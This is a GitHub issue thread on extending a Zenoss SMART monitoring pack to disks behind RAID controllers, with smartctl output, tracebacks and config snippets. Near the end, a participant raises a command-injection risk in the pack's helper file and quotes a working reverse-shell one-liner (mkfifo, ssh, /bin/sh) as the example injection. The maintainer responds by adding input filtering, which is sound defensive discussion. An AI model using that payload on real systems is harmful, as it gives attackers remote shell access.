daviswr / ZenPacks.daviswr.SMART

Storage device health monitoring for Zenoss
MIT License

Support indexed devices behind RAID controller #4

Closed daviswr closed 1 year ago

daviswr commented 2 years ago

Need to model driver & index from smartctl --scan so that the --device parameter can be passed during performance stat collection.

/dev/bus/0 -d megaraid,8 for example

May need new system for component ID, and don't really want to use serial number.
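As a rough illustration of the modeling step described above, the following Python sketch pulls the device path and the `-d` type (driver plus index) out of `smartctl --scan` output and rebuilds the arguments for a later poll. The helper names `parse_scan` and `smartctl_args` are hypothetical and not taken from the pack; the sample lines are illustrative, and the `-iAH` flags are simply the ones used elsewhere in this thread.

```python
import re

# Matches the leading "<path> -d <type>" part of a scan line, e.g.
# "/dev/bus/0 -d megaraid,8 # /dev/bus/0 [megaraid_disk_08], SCSI device"
SCAN_LINE = re.compile(r'^(?P<path>/\S+)\s+-d\s+(?P<type>\S+)')


def parse_scan(output):
    """Return (path, device_type) pairs found in `smartctl --scan` output."""
    devices = []
    for line in output.splitlines():
        match = SCAN_LINE.match(line.strip())
        if match:
            devices.append((match.group('path'), match.group('type')))
    return devices


def smartctl_args(path, device_type):
    """Build an argument list for polling one device (hypothetical helper)."""
    return ['smartctl', '-iAH', path, '-d', device_type]


# Illustrative sample input, not captured from a real host.
sample = (
    "/dev/sda -d scsi # /dev/sda, SCSI device\n"
    "/dev/bus/0 -d megaraid,8 # /dev/bus/0 [megaraid_disk_08], SCSI device\n"
)

for path, device_type in parse_scan(sample):
    print(' '.join(smartctl_args(path, device_type)))
```

Keeping the path and the type as a pair, rather than the path alone, is what would let several disks behind one controller be told apart without falling back to the serial number.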

sempervictus commented 2 years ago

I've seen HPSAs requiring weirdness like smartctl /dev/sda -d cciss,1 to query sda, but then querying sdb can still work by going through sda with smartctl /dev/sda -d cciss,1 or the like. This would be a grand feature for the pack as those things, their Dell counterparts, and other rebranded LSI & friends' kit using silly distributor firmware are all too common.

sempervictus commented 2 years ago

At the current revision, i'm seeing the only SATA-attached SSD on an HP host but not any of the HPSA-attached devices: (screenshot)

daviswr commented 2 years ago

Were they showing up before?

Can you post the smartctl --scan output from that host?

sempervictus commented 2 years ago

This is now working, at least for megaraid. Checking HPSAs shortly (all of the ones i have right now are in HBA mode instead of LUN-per-disk like the older stuff).

sempervictus commented 2 years ago

HPSA isn't so great. You can get to it via:

smartctl -iAH /dev/sda -d cciss,1
smartctl 7.2 2020-12-30 r5155 [x86_64-linux-5.10.75] (local build)
Copyright (C) 2002-20, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Family:     Western Digital Red
Device Model:     WDC WD30EFRX-68EUZN0
Serial Number:    WD-WCC4NXXXXXXX
LU WWN Device Id: 5 0014ee 20d1a13eb
Firmware Version: 82.00A82
User Capacity:    3,000,592,982,016 bytes [3.00 TB]
Sector Sizes:     512 bytes logical, 4096 bytes physical
Rotation Rate:    5400 rpm
Device is:        In smartctl database [for details use: -P show]
ATA Version is:   ACS-2 (minor revision not indicated)
SATA Version is:  SATA 3.0, 6.0 Gb/s (current: 6.0 Gb/s)
Local Time is:    Mon Nov 15 00:44:53 2021 UTC
SMART support is: Available - device has SMART capability.
SMART support is: Enabled

=== START OF READ SMART DATA SECTION ===
SMART Status not supported: Incomplete response, ATA output registers missing
SMART overall-health self-assessment test result: PASSED
Warning: This result is based on an Attribute check.

SMART Attributes Data Structure revision number: 16
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  1 Raw_Read_Error_Rate     0x002f   200   200   051    Pre-fail  Always       -       0
  3 Spin_Up_Time            0x0027   182   182   021    Pre-fail  Always       -       5883
  4 Start_Stop_Count        0x0032   100   100   000    Old_age   Always       -       52
  5 Reallocated_Sector_Ct   0x0033   200   200   140    Pre-fail  Always       -       0
  7 Seek_Error_Rate         0x002e   200   200   000    Old_age   Always       -       0
  9 Power_On_Hours          0x0032   068   068   000    Old_age   Always       -       23724
 10 Spin_Retry_Count        0x0032   100   253   000    Old_age   Always       -       0
 11 Calibration_Retry_Count 0x0032   100   253   000    Old_age   Always       -       0
 12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       52
192 Power-Off_Retract_Count 0x0032   200   200   000    Old_age   Always       -       46
193 Load_Cycle_Count        0x0032   191   191   000    Old_age   Always       -       29382
194 Temperature_Celsius     0x0022   113   102   000    Old_age   Always       -       37
196 Reallocated_Event_Count 0x0032   200   200   000    Old_age   Always       -       0
197 Current_Pending_Sector  0x0032   200   200   000    Old_age   Always       -       0
198 Offline_Uncorrectable   0x0030   100   253   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x0032   200   200   000    Old_age   Always       -       0
200 Multi_Zone_Error_Rate   0x0008   100   253   000    Old_age   Offline      -       0

There's no /dev/bus/0, and --scan only shows sdg, which is SATA-connected :(. Fun story with these is that /dev/sda -d cciss,1 and 2 and 3 and so on give you different disks, so the interface is /dev/sda but the number at the end is the drive being interrogated.

sempervictus commented 2 years ago

Dell uses megaraid i guess, so that works (older r410s tested)

daviswr commented 2 years ago

If --scan doesn't show them, I'm a little unsure how to discover them. What would you think of a text file in the home dir of the Zenoss utility account on the target host with things like "/dev/sda -d cciss,1" for manual entries to model?

sempervictus commented 2 years ago

The text file idea is neat, but you might run into nonsense with how the new dockerized zenoss handles state. It also decapsulates the intrinsic data storage paradigm of the stack as IIRC only the Zenoss application uses local files (configs) whereas the application logic itself uses the DB. Need to ponder on this one, kind of a pickle - lots of HPSAs out there.

daviswr commented 2 years ago

I meant a file on the remote host, to be read after the smartctl scan. Not suggesting we start modifying the Zenoss collection container images :)

daviswr commented 2 years ago

382fa8d25b7da012e7beb1c74feca69fae180e35 will look for a zenoss_smart.txt file in the home directory of whatever account Zenoss is using to SSH on the target machine.

For example:

/dev/sda -d cciss,1
/dev/sda -d cciss,2
/dev/sda -d cciss,3

and the modeler should pick it up
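For readers who want a feel for what reading such a file involves, here is a minimal Python sketch. It is not the code from the commit above; `parse_helper_entries` is a hypothetical name, and the rules it applies (exactly three fields, an absolute path, a literal `-d`) are assumptions made for the example.

```python
def parse_helper_entries(text):
    """Return (path, device_type) pairs from helper-file text.

    Assumed line format: "<absolute path> -d <type>", one entry per line.
    Anything else, including blank lines, is skipped.
    """
    entries = []
    for raw in text.splitlines():
        fields = raw.split()
        if len(fields) != 3 or fields[1] != '-d':
            continue
        path, _, device_type = fields
        if not path.startswith('/'):
            # Assumption: relative names such as "sda" are not accepted.
            continue
        entries.append((path, device_type))
    return entries


contents = (
    "/dev/sda -d cciss,1\n"
    "/dev/sda -d cciss,2\n"
    "\n"
    "sda -d cciss,3\n"
)
print(parse_helper_entries(contents))
```

The entries produced this way have the same shape as the path and type pairs found by `smartctl --scan`, so manual and discovered devices could be modeled through the same path.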

sempervictus commented 2 years ago

Thank you sir - using i=0; for e in a b c d e f; do echo "sd$e -d cciss,$i"; i=$((i+1)); done > ~/zenoss_smart.txt on the target host to test.

sempervictus commented 2 years ago

So @ 5b14dfc848d, with that file created, i am unfortunately not seeing drives appear in the SMART component after a full Zenoss restart post-update. It does still pick up the one device that is SATA-connected and not on the HPSA (nor in the ~/zenoss_smart.txt file) in case that matters.

sempervictus commented 2 years ago

Ah! i see what i did wrong there - needed to be i=0; for e in a b c d e f; do echo "/dev/sd$e -d cciss,$i"; i=$((i+1)); done > zenoss_smart.txt ... it can't presume /dev/ as the path so needs a full path from root mount. Works as described - thank you.

sempervictus commented 2 years ago

Small presentation nit: SATA device names appear as the name, CCISS device names appear as the path: (screenshot)

I think the path should go in the name section sans the -d ... bit since that can be seen in the details, while the device col should probably match the SATA version's output.

daviswr commented 2 years ago

Excellent. I'll update the Readme shortly.

As for the columns, could you make a table showing what you have in mind? I want to make sure I'm following you correctly.

For consistency's sake, how are you thinking these cases should look?

Thanks!

sempervictus commented 2 years ago

Sorry, didn't mean to confuse the issue: the screenshot above includes a SATA disk at the bottom and CCISS disks at the top. The suggestion was to have the top disks look like the bottom one in the generic view, at least such that the device column is .split('/')[-1]
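To make the suggestion concrete, a small Python sketch of that column rule follows. `device_column` is a hypothetical helper, and it assumes the component name is the path optionally followed by `-d <type>`, as in the helper-file entries discussed earlier.

```python
def device_column(component_name):
    """Return the short device name for the device column.

    Assumes names look like "/dev/sdg" or "/dev/sda -d cciss,1".
    """
    fields = component_name.split()
    if not fields:
        return ''
    # First field is the path; keep only its last component.
    return fields[0].split('/')[-1]


for name in ('/dev/sdg', '/dev/sda -d cciss,1', '/dev/bus/0 -d megaraid,8'):
    print(device_column(name))
```

Since every CCISS disk in this thread is addressed through the same /dev/sda path, the column alone would show the same value for all of them; the index still has to live somewhere (the name or the details) to tell the disks apart.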

daviswr commented 2 years ago

No problem! fc8dfe2e0553002c49f2ea5b8872acdd01295ea6

sempervictus commented 2 years ago

Just a heads up - Zenoss 6 doesn't seem to need this, but v4 does apparently require we remove and replace the zenpack at this point. It might be the older construction kit though:

[zenoss@zen01 ZenPacks.daviswr.SMART]$ fil /var/spool/mail/zenoss 
-bash: fil: command not found
[zenoss@zen01 ZenPacks.daviswr.SMART]$ file /var/spool/mail/zenoss 
/var/spool/mail/zenoss: ASCII mail text, with very long lines
[zenoss@zen01 ZenPacks.daviswr.SMART]$ tail /var/spool/mail/zenoss 
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
    from Products.ZenModel.migrate.Migrate import Version
  File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
    __import__(module[:-3], locals(), globals())
  File "/opt/zenoss/Products/ZenModel/migrate/fixEmailNotificationClearSubjectFormat.py", line 18, in <module>
    from Products.ZenModel.migrate import Migrate
ImportError: cannot import name Migrate
...

sempervictus commented 2 years ago

This might be a bit more messy than expected. Looks like on zenoss4 there's some constructionkit issue:

ERROR:zen.ZenossStartup:Error encountered while processing ZenPacks.community.ConstructionKit
Traceback (most recent call last):
  File "/opt/zenoss/Products/ZenossStartup/__init__.py", line 27, in <module>
    pkg_path = zpkg.load().__path__[0]
  File "/opt/zenoss/lib/python/pkg_resources.py", line 1954, in load
    entry = __import__(self.module_name, globals(),globals(), ['__name__'])
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/__init__.py", line 3, in <module>
    from ZenPacks.community.ConstructionKit.Construct import *
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/Construct.py", line 7, in <module>
    from ZenPacks.community.ConstructionKit.BasicDefinition import *
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
    from Products.ZenModel.migrate.Migrate import Version
  File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
    __import__(module[:-3], locals(), globals())
  File "/opt/zenoss/Products/ZenModel/migrate/standalone_datapoint_rename.py", line 19, in <module>
    os.rename(fullpath, os.path.join(d, '%s_%s.rrd' % (base, base)))
OSError: [Errno 2] No such file or directory

... and that's just the --remove call. Might be in for some pain here.

daviswr commented 2 years ago

None of my packs use ConstructionKit, they're all built on ZenPackLib.

sempervictus commented 2 years ago

Ha, well, this instance is ~5yo and has ~100 packs in it. It's all on ZFS anyway and i take zenbatchdumps so i can restore snaps or the whole thing. It's slated for replacement in Q1 anyway with a v6 somewhere up in Bezos' stack. Unwinding zope-isms is bad enough, not sure how far down this specific rabbit hole i want to fall in terms of RCA if i can recover state (though the quality of said state is definitely in question now).

daviswr commented 2 years ago

Just in case it's causing a problem, though, add this back to the yaml after classes->SmartStorage->properties->SmartSupport

      # smartctl --get=all
      AamFeature:
        label: Automatic Acoustic Management
        short_label: AAM
        default: Unavailable
        details_display: false
        order: 29
      ApmFeature:
        label: Advanced Power Management
        short_label: APM
        default: Unavailable
        details_display: false
        order: 30
      RdLookAhead:
        label: Read Look-Ahead
        default: Unavailable
        details_display: false
        order: 31
      WriteCache:
        label: Write Cache
        default: Unavailable
        details_display: false
        order: 32
      AtaSecurity:
        label: ATA Security
        short_label: Security
        default: Unavailable
        details_display: false
        order: 33

Though I've never had a problem removing a pack when the yaml lacked attributes it was installed with, aside from leaving shit on objects that doesn't need to be there. Renaming attributes, though, is a whole other can of worms.

sempervictus commented 2 years ago

Renaming has bitten me so many times that i'm pretty sure i produce anti-venom at this point - been using Zenoss for >10y. :) It's why we have SOP for cron jobs to do zen dumps - external state in a flat file is safer than the catacombs of Arkham asylum otherwise known as zodb/zope.

This seems to be working properly now - still seeing the -d cciss,X suffix in the name column, but functionally works just as advertised.

Would be remiss if i didn't ask - does the zenpack filter what's in these files in any way (drop |, &&, backticks, and so on)? I could see something like dirtycow happening years down the line permitting people to execute privileged commands by overwriting this file - it's niche, but might hurt given the privs required to run smartctl and how few people use granular sudo configs (or straight-up root login for privileged functions).

EDIT - as an example, content such as this could create "a problem":

/dev/sda -d `mkfifo /tmp/kwpsul;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 255.255.255.255 0</tmp/kwpsul|/bin/sh >/tmp/kwpsul 2>&1;rm /tmp/kwpsul`

which has a lot of special characters and fun "filterables" but is just one of many publicly available similar payloads (well, in this case it's a generator i wrote into MSF).

daviswr commented 2 years ago

I can drop the -d param from the title if it also contains cciss. Right now only "auto" is dropped and all indexed ones have the full name.

As for filtering file contents: right now, no, but I think a quick grep -v with some common characters that likely won't ever be in a smartctl device name should provide some measure of protection. I'll open an issue to track that.
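The grep -v idea is a denylist. For comparison, here is a hedged Python sketch of the complementary allowlist approach, which accepts only lines shaped like `<path> -d <type>` and rejects everything else. This is not the pack's implementation; the pattern and the name `filter_entries` are assumptions made for illustration, and the allowed character set is a guess at what smartctl device paths and type names need.

```python
import re

# Allowlist: absolute device path, "-d", then a device type built from
# letters, digits and the punctuation seen in type names (",", "+", "/", "_").
VALID_ENTRY = re.compile(r'\A/[A-Za-z0-9_./-]+ -d [A-Za-z0-9_,+/]+\Z')


def filter_entries(lines):
    """Keep only lines that look like '<path> -d <type>'; drop the rest."""
    kept = []
    for line in lines:
        candidate = ' '.join(line.split())  # collapse whitespace, trim ends
        if VALID_ENTRY.match(candidate):
            kept.append(candidate)
    return kept


lines = [
    '/dev/sda -d cciss,1',
    '/dev/bus/0 -d megaraid,8',
    '/dev/sda -d `id`',
    '/dev/sda -d cciss,1; reboot',
    '/dev/sda -d cciss,1 && id',
]
print(filter_entries(lines))
```

Only the first two entries survive. An allowlist fails closed: a metacharacter nobody thought to list is rejected by default, whereas a denylist lets it through.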

daviswr commented 2 years ago

ddc9b1eb6e4bee9e73e2a3d8cf527a25fcae028e - "-d cciss,X" omitted from component title
36ad2015b131aa2795ba0c6d45ea01fd7248149b - Filter lines from model helper file with invalid content